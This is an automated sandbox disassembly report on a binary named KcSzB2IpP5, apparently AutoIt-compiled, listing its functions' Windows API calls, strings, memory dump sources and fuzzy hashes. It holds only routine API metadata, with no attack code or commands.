Opcode ID: e5b356a699d30121989fd83288451e432734648fa9d8b56c9729b4fe7bd28856
Instruction ID: 5bfe1b06ce7a46d4f193f256306f8643213d64a55d7f977975c141cc7ca0256d
Opcode Fuzzy Hash: e5b356a699d30121989fd83288451e432734648fa9d8b56c9729b4fe7bd28856
Instruction Fuzzy Hash: 9F219F35500305ABDB208F799C54BAA77E4AF85720F200A1BECA1E33E0D774D860CB28

Function 004F40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0046604C
Part of subcall function 0046600E: GetStockObject.GDI32(00000011), ref: 00466060
Part of subcall function 0046600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0046606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004F4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004F411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004F412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004F4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004F4145

Strings

Msctls_Progress32, xrefs: 004F40E3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d2b0af0e5a83170c1d08818b3233118e99f77eaa865e774ea9f6743d545b0cda
Instruction ID: 16ed3e4c2804394866075081d3983633107a1b2bf5970de392be08fda15db773
Opcode Fuzzy Hash: d2b0af0e5a83170c1d08818b3233118e99f77eaa865e774ea9f6743d545b0cda
Instruction Fuzzy Hash: 5B1190B214021DBEEF118E64CC85EF77F5DEF08798F014111BB18A6190CB769C21DBA8

Function 0049D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0049D7A3: _free.LIBCMT ref: 0049D7CC

_free.LIBCMT ref: 0049D82D

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 0049D838
_free.LIBCMT ref: 0049D843
_free.LIBCMT ref: 0049D897
_free.LIBCMT ref: 0049D8A2
_free.LIBCMT ref: 0049D8AD
_free.LIBCMT ref: 0049D8B8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 1404d557fa240141a54864cebbbae7c62a7e2025f99b7c7e4bf845c11e081bef
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: F3112CB1A40B04BADE21FFF2CC46FCB7F9C6F00704F40083AB29DA6092DA69A50546A4

Function 004CDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004CDA74
LoadStringW.USER32(00000000), ref: 004CDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004CDA91
LoadStringW.USER32(00000000), ref: 004CDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004CDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004CDAB9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f470285e3f2f37733121598e2fb9e7071f93e3c66e65b3844cc090777cd1a7d4
Instruction ID: 5f2a35e03594c9d98b521a52226a99a17a7958ef3cfa4ef5bdd1e480773be5ff
Opcode Fuzzy Hash: f470285e3f2f37733121598e2fb9e7071f93e3c66e65b3844cc090777cd1a7d4
Instruction Fuzzy Hash: 270186F690020C7FEB50ABA09EC9EF7776CEB08701F4044A6B746E2041E6749E948F78

Function 004D096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00F9F0B0,00F9F0B0), ref: 004D097B
EnterCriticalSection.KERNEL32(00F9F090,00000000), ref: 004D098D
TerminateThread.KERNEL32(00534528,000001F6), ref: 004D099B
WaitForSingleObject.KERNEL32(00534528,000003E8), ref: 004D09A9
CloseHandle.KERNEL32(00534528), ref: 004D09B8
InterlockedExchange.KERNEL32(00F9F0B0,000001F6), ref: 004D09C8
LeaveCriticalSection.KERNEL32(00F9F090), ref: 004D09CF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ed974dc79369bbe7e90dd3f03d4922b33333fa8c0f8495fba5519f770695b33b
Instruction ID: 51627cf80ff9fd7acbe16a40dc24d62b336622fa8d72d006e0c8547887c5271b
Opcode Fuzzy Hash: ed974dc79369bbe7e90dd3f03d4922b33333fa8c0f8495fba5519f770695b33b
Instruction Fuzzy Hash: 82F01D71442506ABD7415B94EFC8BE67A25FF01702F411066F101918A0C7749475DF98

Function 004E1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 004E1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004E1DE1
WSAGetLastError.WSOCK32 ref: 004E1DF2
htons.WSOCK32(?), ref: 004E1EDB
inet_ntoa.WSOCK32(?), ref: 004E1E8C

Part of subcall function 004C39E8: _strlen.LIBCMT ref: 004C39F2

Part of subcall function 004E3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,004DEC0C), ref: 004E3240

_strlen.LIBCMT ref: 004E1F35

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9ce31a1b57a4ec85b2ea4eaa74a9d3020aebeb5c8392fa5c799154a914f053a2
Instruction ID: 21494dbfb633a56995685aa4acdea0974d5c1064f80442182aa5b360466f6ed3
Opcode Fuzzy Hash: 9ce31a1b57a4ec85b2ea4eaa74a9d3020aebeb5c8392fa5c799154a914f053a2
Instruction Fuzzy Hash: 62B1E430244340AFC324DF26C885E6A77E5AF84318F54854EF4564B3E2DB79ED46CB96

Function 004901B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004900BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004900D6
__allrem.LIBCMT ref: 004900ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049010B
__allrem.LIBCMT ref: 00490122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00490140

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: bbdd36c8a770357bc8b1d81001894e66f780e1fa004d837924cee71a206b1361
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: D781F4716007069FEB20AA69DC42B6F77A8AF41728F24453FF651D7381E779D9008798

Function 004961FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004882D9,004882D9,?,?,?,0049644F,00000001,00000001,8BE85006), ref: 00496258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0049644F,00000001,00000001,8BE85006,?,?,?), ref: 004962DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004963D8
__freea.LIBCMT ref: 004963E5

Part of subcall function 00493820: RtlAllocateHeap.NTDLL(00000000,?,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6,?,00461129), ref: 00493852

__freea.LIBCMT ref: 004963EE
__freea.LIBCMT ref: 00496413

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bca1961f1ec43cd2d31b07707a4dd627dc7337be8bc5e7028bb2b143106749d9
Instruction ID: 3189204987d809314b52a395665a613fc5d5d07a5ecc8733a5232c246ec9ef9f
Opcode Fuzzy Hash: bca1961f1ec43cd2d31b07707a4dd627dc7337be8bc5e7028bb2b143106749d9
Instruction Fuzzy Hash: D1510072600216ABEF369F64CC85EAF7FA9EB44714F16467AFC05D6240EB38DC50C668

Function 004EBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004EB6AE,?,?), ref: 004EC9B5
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004EC9F1
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA68
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004EBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004EBD25
RegCloseKey.ADVAPI32(00000000), ref: 004EBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004EBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004EBDF3
RegCloseKey.ADVAPI32(?), ref: 004EBDFF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 2d628086e983f56f7abd2da07b3ec1ee71e55c855aa47386c515dd17c2b59a5f
Instruction ID: 6a14ebc7b99b6889608a6ed67b116c05d721d7896f53682506fea6820bfee942
Opcode Fuzzy Hash: 2d628086e983f56f7abd2da07b3ec1ee71e55c855aa47386c515dd17c2b59a5f
Instruction Fuzzy Hash: F081AF30208281AFD714DF25C885E2BBBE5FF84308F14896EF4594B2A2DB35ED45CB96

Function 004BF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 004BF7B9
SysAllocString.OLEAUT32(00000001), ref: 004BF860
VariantCopy.OLEAUT32(004BFA64,00000000), ref: 004BF889
VariantClear.OLEAUT32(004BFA64), ref: 004BF8AD
VariantCopy.OLEAUT32(004BFA64,00000000), ref: 004BF8B1
VariantClear.OLEAUT32(?), ref: 004BF8BB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 61fa5b71b94594e1cb115657d5a4a0998aba52e94ae328ebb1ffa8592c357cfb
Instruction ID: 9680c66f762eaa1283898a0327a9706ad97b75c4eaa5597eee755e1083a941b7
Opcode Fuzzy Hash: 61fa5b71b94594e1cb115657d5a4a0998aba52e94ae328ebb1ffa8592c357cfb
Instruction Fuzzy Hash: 2E51EB71500310BACF206B66DC957A9B3A8EF45714B10947BE90ADF291DB788C49C77F

Function 004D910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00467620: _wcslen.LIBCMT ref: 00467625

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 004D94E5
_wcslen.LIBCMT ref: 004D9506
_wcslen.LIBCMT ref: 004D952D
GetSaveFileNameW.COMDLG32(00000058), ref: 004D9585

Strings

X, xrefs: 004D9412

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 0d00067d88cbbe7367a63212a957910b904519c322ab4476b6c9ce926cad3b51
Instruction ID: 08175e480df5b621f8481388511e55bf5f4ef507eac5db1d642feb50dc03f257
Opcode Fuzzy Hash: 0d00067d88cbbe7367a63212a957910b904519c322ab4476b6c9ce926cad3b51
Instruction Fuzzy Hash: FDE1A3716043409FC724EF25C491A6AB7E4BF85318F14896FE8899B3A2EB34DD05CB96

Function 0047920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

BeginPaint.USER32(?,?,?), ref: 00479241
GetWindowRect.USER32(?,?), ref: 004792A5
ScreenToClient.USER32(?,?), ref: 004792C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004792D3
EndPaint.USER32(?,?,?,?,?), ref: 00479321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004B71EA

Part of subcall function 00479339: BeginPath.GDI32(00000000), ref: 00479357

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 32ea73e7114bb7bbdf4529cdcb5adba9bcacc43d79adc4b030a20f13457584d1
Instruction ID: 0bd30989df111a6ba2295735863a9e70dcee030202f9dfe42783921d88c429b0
Opcode Fuzzy Hash: 32ea73e7114bb7bbdf4529cdcb5adba9bcacc43d79adc4b030a20f13457584d1
Instruction Fuzzy Hash: B841A131108201AFD710DF25CC84FBA7BA8EB99324F14466AF959C72A1C7359C49DB6A

Function 004D07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004D080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004D0847
EnterCriticalSection.KERNEL32(?), ref: 004D0863
LeaveCriticalSection.KERNEL32(?), ref: 004D08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004D08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004D0921

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 11d006d5a351fa1c543c224160fd8db9b291d888a73e367afb7b6c1844fe84f4
Instruction ID: b6f09cff6fb563c6c77fdfd86392f9e089ea1b4f96a4ca93e35b51cfd6255689
Opcode Fuzzy Hash: 11d006d5a351fa1c543c224160fd8db9b291d888a73e367afb7b6c1844fe84f4
Instruction Fuzzy Hash: 03418A71900205EBDF14AF54DC85AAA77B8FF04304F1480AAFD049B296DB34DE65DBA8

Function 004F81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004BF3AB,00000000,?,?,00000000,?,004B682C,00000004,00000000,00000000), ref: 004F824C
EnableWindow.USER32(00000000,00000000), ref: 004F8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 004F82D1
ShowWindow.USER32(00000000,00000004), ref: 004F82E5
EnableWindow.USER32(00000000,00000001), ref: 004F830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004F832F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 877cb19ba56e5d8ccde18436a07291246a30f034458d633baeaeaabf6e920c13
Instruction ID: dd026be1a19f286bf19784d01253421c9e9095b470693157dba4fe6dc0ec2c60
Opcode Fuzzy Hash: 877cb19ba56e5d8ccde18436a07291246a30f034458d633baeaeaabf6e920c13
Instruction Fuzzy Hash: 1E417135601A48EFDB11CF25C999BB97BE0BB05714F1941AEEA084F372CB36A845CB58

Function 004C4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004C4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004C4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004C4CEA
_wcslen.LIBCMT ref: 004C4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004C4D10
_wcsstr.LIBVCRUNTIME ref: 004C4D1A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ad233f4cde671abb928ecbcf670c4a6d21fff4593318e5672c6036a9abb514f9
Instruction ID: 0ee41c3885ce1fb7c42bc671938264b88eeb6a1c0b9e864e09267a1c94a8dce8
Opcode Fuzzy Hash: ad233f4cde671abb928ecbcf670c4a6d21fff4593318e5672c6036a9abb514f9
Instruction Fuzzy Hash: 52210A352041047BFB556B359E55F7B7B98DF85750F10803FF809CA191EA69CC01C364

Function 004D581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00463AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00463A97,?,?,00462E7F,?,?,?,00000000), ref: 00463AC2

_wcslen.LIBCMT ref: 004D587B
CoInitialize.OLE32(00000000), ref: 004D5995
CoCreateInstance.OLE32(004FFCF8,00000000,00000001,004FFB68,?), ref: 004D59AE
CoUninitialize.OLE32 ref: 004D59CC

Strings

.lnk, xrefs: 004D5876, 004D58C1, 004D5985

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 7685cf8de0a624893126e1d06e5a4acd70472994fdfc1f593796d646e6a0d65d
Instruction ID: 4dd683de32ca2c0601986640a8a918a133e6d92e7c48512c863157cdef2ba778
Opcode Fuzzy Hash: 7685cf8de0a624893126e1d06e5a4acd70472994fdfc1f593796d646e6a0d65d
Instruction Fuzzy Hash: D7D155706046019FC714DF25C4A092ABBE5FF89718F14489FF88A9B361DB39EC45CB96

Function 004C175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004C0FCA
Part of subcall function 004C0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004C0FD6
Part of subcall function 004C0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004C0FE5
